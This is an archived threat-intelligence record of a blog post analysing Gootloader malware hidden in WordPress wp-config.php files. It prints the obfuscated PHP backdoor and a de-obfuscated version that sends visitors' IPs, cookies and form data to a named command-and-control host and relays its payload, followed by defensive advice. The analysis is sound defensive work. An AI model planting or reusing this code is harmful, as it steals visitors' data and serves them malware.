{
	"id": "6a210e66-f267-44bc-a3c2-d21beb893e16",
	"created_at": "2026-04-06T00:22:02.804972Z",
	"updated_at": "2026-04-10T13:11:44.924923Z",
	"deleted_at": null,
	"sha1_hash": "63b23b4dda4072ca4de621cf0a909d7b968b4338",
	"title": "Gootloader’s New Hideout Revealed: The Malware Hunt in WordPress’ Shadows",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 63541,
	"plain_text": "Gootloader’s New Hideout Revealed: The Malware Hunt in WordPress’ Shadows\r\nBy gootloadersites\r\nPublished: 2024-06-24 · Archived: 2026-04-05 13:57:41 UTC\r\nIntro\r\nCybersecurity experts and enthusiasts, brace yourselves! The notorious Gootloader malware is at it again, shifting tactics and burrowing deeper into compromised WordPress sites. Just when we thought we had them pinned down, they’ve executed a sleight of hand. This blog post uncovers their latest evasion techniques and provides insights into how they’ve been hiding in plain sight.\r\nThe Discovery of the Hidden Gootloader\r\nGootloader has been a persistent threat, known for its crafty use of WordPress blogs to propagate malicious code. Initially, these compromised sites called out to the xmlrpc.php file, which was a dead giveaway for those tracking their nefarious activities. However, around mid-April, a significant change was detected: the URL call shifted to the main blog URL itself. This change threw many of us off the scent, creating a smokescreen that effectively concealed their tracks. The question lingered: where were they hiding their malicious PHP code now?\r\nThe Hidden Lair: wp-config.php\r\nAfter meticulous investigation and a fair share of digital sleuthing, the answer came to light. The Gootloader masterminds have been embedding their malicious PHP code within the wp-config.php file of compromised WordPress installations. This file, crucial for WordPress configuration, often goes unnoticed during routine security checks, making it an ideal hiding spot for cybercriminals.\r\nHere is their obfuscated code (as captured; several lines are cut off at the right margin in the archived copy):\r\n\u003c?php if (isset($_COOKIE)) { if (strpos($_SERVER[\"\\x48\\124\\124\\120\\x5f\\x55\\x53\\x45\\x52\\137\\101\\107\\105\\116\\x54\"],\r\n\"\\x43\\150\\162\\x6f\\155\\145\") !== false) { if (preg_match(\"\\57\\x21\\133\\101\\x2d\\106\\x30\\55\\71\\135\\x7b\\61\\x30\\x7d\\x21\\x2f\",\r\nimplode(\"\\x21\", array_keys($_COOKIE)) . \"\\41\")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,\r\n\"\\x68\\164\\x74\\160\\x73\\72\\x2f\\57\\x74\\145\\x6d\\160\\x6f\\162\\x61\\162\\x79\\56\\x66\\141\\x69\\154\\x2f\\151\\x6e\\144\\x65\\170\\x2e\\160\\x\r\ncurl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIF\r\n0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $d = array(\"\\x69\" =\u003e\r\nserialize($_SERVER[\"\\x52\\x45\\115\\117\\124\\x45\\137\\x41\\104\\x44\\x52\"]), \"\\165\" =\u003e\r\nserialize($_SERVER[\"\\110\\x54\\x54\\x50\\x5f\\x55\\123\\105\\122\\137\\101\\x47\\x45\\x4e\\x54\"]), \"\\x68\" =\u003e\r\nserialize($_SERVER[\"\\x48\\x54\\x54\\x50\\x5f\\110\\117\\x53\\124\"]), \"\\x63\" =\u003e serialize($_COOKIE), \"\\x67\" =\u003e serialize($_GET),\r\nserialize($_POST)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); $r = curl_exec($ch); curl_close($ch); if\r\n(strpos($r, \"\\x47\\111\\x46\\x38\\71\") !== false) {\r\nheader(\"\\x43\\x6f\\156\\x74\\145\\156\\164\\55\\124\\x79\\x70\\x65\\72\\40\\151\\x6d\\141\\x67\\x65\\57\\x67\\x69\\x66\"); echo $r; die; } } }\r\nAnd here is the code de-obfuscated and beautified:\r\n\u003c?php\r\nif (isset($_COOKIE)) {\r\n    // Only serve visitors whose User-Agent contains \"Chrome\"\r\n    if (strpos($_SERVER[\"HTTP_USER_AGENT\"], \"Chrome\") !== false) {\r\n        // ... and only when some cookie name is exactly ten upper-case hex characters\r\n        if (preg_match(\"/![A-F0-9]{10}!/\", \"!\" . implode(\"!\", array_keys($_COOKIE)) . \"!\")) {\r\n            $ch = curl_init();\r\n            // the curl_setopt($ch, CURLOPT_URL, ...) call that names the C2 is cut off in the archived copy\r\n            curl_setopt($ch, CURLOPT_POST, TRUE);\r\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);\r\n            // TLS verification disabled, so the C2 needs no valid certificate\r\n            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);\r\n            // Forward the visitor's address, headers, cookies and request data to the C2\r\n            $d = array(\r\n                \"i\" =\u003e serialize($_SERVER[\"REMOTE_ADDR\"]),\r\n                \"u\" =\u003e serialize($_SERVER[\"HTTP_USER_AGENT\"]),\r\n                \"h\" =\u003e serialize($_SERVER[\"HTTP_HOST\"]),\r\n                \"c\" =\u003e serialize($_COOKIE),\r\n                \"g\" =\u003e serialize($_GET),\r\n                \"p\" =\u003e serialize($_POST)\r\n            );\r\n            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d));\r\n            $r = curl_exec($ch);\r\n            curl_close($ch);\r\n            // If the C2 answers with something that contains a GIF header, relay it to the visitor as an image\r\n            if (strpos($r, \"GIF89\") !== false) {\r\n                header(\"Content-Type: image/gif\");\r\n                echo $r;\r\n                die;\r\n            }\r\n        }\r\n    }\r\n}\r\n?\u003e\r\nThe New C2 Server: temporary.fail/91.215.85.21\r\nBut the discovery didn’t end there. Further analysis revealed that the embedded code in wp-config.php directs to a new Command and Control (C2) server: temporary.fail / 91.215.85.21. This new server is where the infected sites are now communicating, ensuring the malware’s operations continue without interruption.\r\nImplications and Defense Strategies\r\nThis shift in Gootloader’s tactics underscores the importance of thorough and continuous security monitoring. For those managing WordPress sites, here are some key takeaways to bolster your defenses:\r\n1. Regularly Audit Key Files: Ensure that files like wp-config.php are regularly audited for unauthorized changes.\r\n2. Monitor Network Traffic: Keep an eye on traffic to detect any unusual connections, particularly to unfamiliar C2 servers like temporary.fail / 91.215.85.21.\r\n3. Harden WordPress Security: Employ security plugins that can detect and neutralize malware. Regularly update WordPress, its themes and plugins to patch vulnerabilities.\r\n4. Backup and Recovery: Maintain regular backups and have a recovery plan in place to swiftly restore to a clean state if a compromise is detected.\r\nConclusion\r\nThe relentless pursuit of hiding places by Gootloader is a stark reminder of the evolving nature of cyber threats. By uncovering their new tactic of using wp-config.php and directing it to temporary.fail / 91.215.85.21, we take a step forward in the ongoing battle against malware. Stay vigilant, stay informed, and keep your digital fortresses secure. Gootloader’s dark arts may evolve, but with keen eyes and robust security practices, we can continue to unveil their hidden shadows.\r\nSource: https://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/"
	],
	"report_names": [
		"gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows"
	],
	"threat_actors": [],
	"ts_created_at": 1775434922,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63b23b4dda4072ca4de621cf0a909d7b968b4338.pdf",
		"text": "https://archive.orkl.eu/63b23b4dda4072ca4de621cf0a909d7b968b4338.txt",
		"img": "https://archive.orkl.eu/63b23b4dda4072ca4de621cf0a909d7b968b4338.jpg"
	}
}